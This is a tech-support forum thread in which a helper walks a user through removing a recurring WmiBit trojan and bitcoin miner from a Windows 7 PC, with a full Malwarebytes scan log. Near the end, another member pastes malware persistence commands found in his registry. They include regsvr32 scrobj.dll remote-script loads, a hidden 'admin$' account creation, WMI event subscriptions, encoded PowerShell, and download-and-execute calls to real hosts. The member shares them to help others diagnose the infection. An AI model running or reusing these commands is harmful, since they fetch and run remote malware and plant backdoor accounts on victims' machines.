some viruses are stuck in my computer and frustrating me

[Anmolrazdan]

Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 1/9/19
Scan Time: 7:14 PM
Log File: ba76cfbf-1414-11e9-874f-089e01f95592.json

-Software Information-
Version: 3.6.1.2711
Components Version: 1.0.463
Update Package Version: 1.0.6913
License: Free

-System Information-
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Hp-PC\Hp

-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 240782
Threats Detected: 29
Threats Quarantined: 29
Time Elapsed: 3 min, 12 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 15
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa, Quarantined, [6047], [430789],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{F5D7FF3D-F5D0-4461-AE7A-2F26E56CF55B}, Quarantined, [6047], [430789],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{F5D7FF3D-F5D0-4461-AE7A-2F26E56CF55B}, Quarantined, [6047], [430789],1.0.6913
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ok, Quarantined, [3703], [417164],1.0.6913
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{B40E32BA-1A3F-409C-B460-69D67C9264CE}, Quarantined, [3703], [417164],1.0.6913
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{B40E32BA-1A3F-409C-B460-69D67C9264CE}, Quarantined, [3703], [417164],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa1, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{9334C4AC-C277-45B3-BFC3-6BB70FC71589}, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{9334C4AC-C277-45B3-BFC3-6BB70FC71589}, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa2, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{FA7301F1-DD2D-462A-A6D6-CE6F13C56428}, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{FA7301F1-DD2D-462A-A6D6-CE6F13C56428}, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa3, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{C10082AF-D23A-46AD-99EA-1F37CDBA3526}, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{C10082AF-D23A-46AD-99EA-1F37CDBA3526}, Quarantined, [6047], [430784],1.0.6913

Registry Value: 6
Trojan.Agent.Generic, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|START, Quarantined, [3703], [400553],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{9334C4AC-C277-45B3-BFC3-6BB70FC71589}|PATH, Quarantined, [6047], [430786],1.0.6913
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{B40E32BA-1A3F-409C-B460-69D67C9264CE}|PATH, Quarantined, [3703], [417161],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{C10082AF-D23A-46AD-99EA-1F37CDBA3526}|PATH, Quarantined, [6047], [430786],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{F5D7FF3D-F5D0-4461-AE7A-2F26E56CF55B}|PATH, Quarantined, [6047], [430791],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{FA7301F1-DD2D-462A-A6D6-CE6F13C56428}|PATH, Quarantined, [6047], [430786],1.0.6913

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 0
(No malicious items detected)

File: 8
Trojan.Agent.BTMGen, C:\WINDOWS\TEMP\CONHOST.EXE, Quarantined, [6149], [217077],1.0.6913
Trojan.BitCoinMiner.WmiBit, C:\WINDOWS\DEBUG\LSMOSE.EXE, Quarantined, [6285], [430813],1.0.6913
Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\MYSA, Quarantined, [6047], [430789],1.0.6913
Trojan.Agent.Generic, C:\WINDOWS\SYSTEM32\TASKS\OK, Quarantined, [3703], [417164],1.0.6913
Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\Mysa1, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\Mysa2, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\Mysa3, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.E, C:\PROGRAM FILES\COMMON FILES\XPDOWN.DAT, Quarantined, [3710], [568219],1.0.6913

Physical Sector: 0
(No malicious items detected)

WMI: 0
(No malicious items detected)

(end)

[LDTate]

Hello  and

Please take your time.

 

Windows 7

Restart your computer in Safe Mode.

Using the F8 or F5 Method:

Restart your computer.

When the computer starts you will see your computer's hardware being listed. When you see this information start to gently tap the F8 key on your keyboard repeatedly until you are presented with the Windows 7 Advanced Boot Options

select the Safe Mode With Networking

Then press the enter key on your keyboard to boot into Windows 7 Safe Mode.

When Windows starts you will be at a typical logon screen. Logon to your computer and Windows 7 will enter Safe mode.

Open Malwarebytes (MBAM), make sure Scan For Rootkits is checked, run a new scan and Quarantine all.

**Power Off** (shutdown, the pc.

Wait a few minutes.

Restart in Normal Mode, run a new scan  and make sure it's gone

[Anmolrazdan]

found some new virus during full scan, please help me

[Anmolrazdan]

i did this but the virus appeared again

[Anmolrazdan]

i quarantined and then deleted them

[LDTate]

Did that take care of it?

 

If not, do this.

 

 NOTE: The tools and the information obtained is safe and not harmful to your privacy or your computer, please allow the programs to run if blocked by your system.

Download Malwarebytes Support Tool
https://downloads.malwarebytes.com/file/mbst?src=Forums-Reply

    Once the file is downloaded, open your Downloads folder/location of the downloaded file
    Double-click mb-support-X.X.X.XXXX.exe to run the program
        You may be prompted by User Account Control (UAC) to allow changes to be made to your computer. Click Yes to consent.
    Place a checkmark next to Accept License Agreement and click Next
    You will be presented with a page stating, "Get Started!"
    Click the Advanced tab

Click the Gather Logs button

A progress bar will appear and the program will proceed with getting logs from your computer

Upon completion, a file named mbst-grab-results.zip will be saved to your Desktop. Click OK

Please attach the file in your next reply.

[Anmolrazdan]

i will do this and will soon messsage you

[Anmolrazdan]

mbst-grab-results.zip

[LDTate]

There's no need to message me as I get notified when you add a reply here.

 

I have attached A file I need you to download and save it to the same place that you saved the FRST program

This fix will include removing temp files and emptying the Recycle Bin.

Download attached **fixlist.txt** and save it to same location where the FRST tool is located.

NOTE: Both FRST.exe and the fixlist.txt must be in the same location or the fix will not work.
Close all browsers before running.

Double click FRST to run the tool. If the tool warns you the version is outdated, please download and run the updated version.
 •Click the **Fix Button**.
 
•If you receive a message that a reboot is required, please make sure you allow it to restart normally.

•The tool will complete its run after restart.

When finished, the tool will make a log (Fixlog.txt) in the same location from where it was run. Please attach the Fixlog.txt in your reply.

Restart the pc and let me know how it's running now.

fixlist.txt

[Anmolrazdan]

can you give me an idea where it will be present, as i am having trouble finding it

[LDTate]

Where what is?

 

[Anmolrazdan]

Fixlog.txt

[Anmolrazdan]

new virus found after restart through threat scan

virus new.txt

[LDTate]

I need you to download and run this tool and ONLY select Repair WMI

https://www.bleepingcomputer.com/download/windows-repair-all-in-one/

[Anmolrazdan]

i did it and restarted the computer, but after the restart malwarebytes was continuously prompting me about trojan, the prompt says site was blocked due to trojan

 

[LDTate]

I need to see what is being blocked

Open Malwarebytes > History > Application Logs
Double Click the **Protection log** to open it
On the lower left select **Export** > Export to Text

Save as mbamscan and Save it to your desktop
Attach the mbamscan text file in your next reply.

[Anmolrazdan]

some of the sites which are being blocked

trojan.txt

trojan 2.txt

trojan 3.txt

trojan 4.txt

trojan 5.txt

trojan 6.txt

trojan 7.txt

[Anmolrazdan]

got a new virus again

virus.txt

[LDTate]

I need new logs

 

Double-click mb-support-X.X.X.XXXX.exe to run the program
        You may be prompted by User Account Control (UAC) to allow changes to be made to your computer. Click Yes to consent.
    Place a checkmark next to Accept License Agreement and click Next
    You will be presented with a page stating, "Get Started!"
    Click the Advanced tab

Click the Gather Logs button

A progress bar will appear and the program will proceed with getting logs from your computer

Upon completion, a file named mbst-grab-results.zip will be saved to your Desktop. Click OK

Please attach the file in your next reply.

[Anmolrazdan]

the results and some files named system volume information and recycle bin folders are formed in lopcal disk, volume E, D,  F 

mbst-grab-results.zip

[LDTate]

I have attached A file I need you to download and save it to the same place that you saved the FRST program

This fix will include removing temp files and emptying the Recycle Bin.

Download attached **fixlist.txt** and save it to same location where the FRST tool is located.

NOTE: Both FRST.exe and the fixlist.txt must be in the same location or the fix will not work.
Close all browsers before running.

Double click FRST to run the tool. If the tool warns you the version is outdated, please download and run the updated version.
 •Click the **Fix Button**.
 
•If you receive a message that a reboot is required, please make sure you allow it to restart normally.

•The tool will complete its run after restart.

When finished, the tool will make a log (Fixlog.txt) in the same location from where it was run. Please attach the Fixlog.txt in your reply.

Restart the pc and let me know how it's running now.

fixlist.txt

[RootyRoot]

I've been having fun for days wrestling with this, myself.  I still don't think I've got it all.

First, and most importantly, before any reboot (even in Safe Mode), check MSCONFIG.  In the StartUp tab, it keeps adding this;

regsvr32 /u /s /i:http://js.1226bye.xyz:280/v.sct scrobj.dll

The URL doesn't actually work, but I don't think that's the point.

My theory is that this is actually a combination of viruses (in the general sense of the word, including worms, malware, rootkits, bootsector virusus, etc.).  My further theory is that they all work together to keep each other activated, and/or reinstall, if one of them gets removed.
It disabled "Hibernate", and even the ability to turn it on.
More importantly, it completely disabled my MalwareBytes from even running.  I'd click it, and it would not even appear in TaskManager.  Reinstalled it to a different directory, uninstalled all of them - nothing worked.  Even MBAM Chameloen would not work.  That's some impressive work.
I tried a number of other anti-virus/anti-malware software, and the best I could get were "there are no more endpoints available from the endpoint mapper" errors.  (Apparently, this has something to do with RPC, according to some scant research I've done.
Powershell is also involved, even though I don't think I have powershell on this infected XP laptop.  Perhaps there's something like it?  I found this in my research;
https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-powersploit-part-1-evading-antivirus-software-0165535/

But I digress.  Part of the merry-go-round were the following files that kept re-appearing;
C:\WINDOWS\system32\max.exe
C:\WINDOWS\system32\new.exe
C:\WINDOWS\TEMP\conhost.exe
and there was something in the C:\WINDOWS\inf directory.

Merely deleting them didn't work.  Out of a kind desperation, I made zero-byte files of the same file names, assuming (correctly, as it turns out) that the virus could/would not overwrite them.  This was not the final solution, but at least seemed to stop part of the merry-go-round of re-installation of other viral components.  At least I could, in Safe Mode, get some other anti-virus software to start to chip away at the other pieces.

WMI (Windows Management Instrumentation) was another piece of this.  I found this command somewhere in the registry.  (Sorry I did not document where.)  (Apologies for the language, but it's not mine.)

cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="*****youmm3" DELETE&wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="*****youmm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="*****youmm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='*****youmm3'" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="*****youmm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="*****youmm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="*****youmm3"", Consumer="CommandLineEventConsumer.Name="*****youmm4""&start regsvr32 /s /u /n /i:http://173.208.172.202:8888\s1.txt scrobj.dll

Some of those URLs don't work, but many of the IP-based ones do.  (Shame on the hosting company that allows them to continue to work!)

This reminds me, part of the viruses create a new user named "admin$".  Make sure not to log in using that.  If it's the only option, reboot in SafeMode.


It is my strong belief that these viruses loaded onto my computer via a website advertisement.  Time for me to invest in ad-blocking software.

I don't have a complete solution for you, since I'm not sure I've completely repaired my laptop, thus far - but at least I'm making progress.  Ideally, some of what I've found so far can help someone more expert than myself try to tackle this.

[RootyRoot]

By the way, "SFX:Agent-E" is involved in this all, somehow.  There was some script somewhere I could not document the location of.

[LDTate]

Did you run the fix I gave you?

For the WMI.

 I need you to download and run this tool and ONLY select Repair WMI

https://www.bleepingcomputer.com/download/windows-repair-all-in-one/

 

[AdvancedSetup]

Due to the lack of feedback, this topic is closed to prevent others from posting here.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this topic. Other members who need assistance please start your own topic in a new thread.

Thanks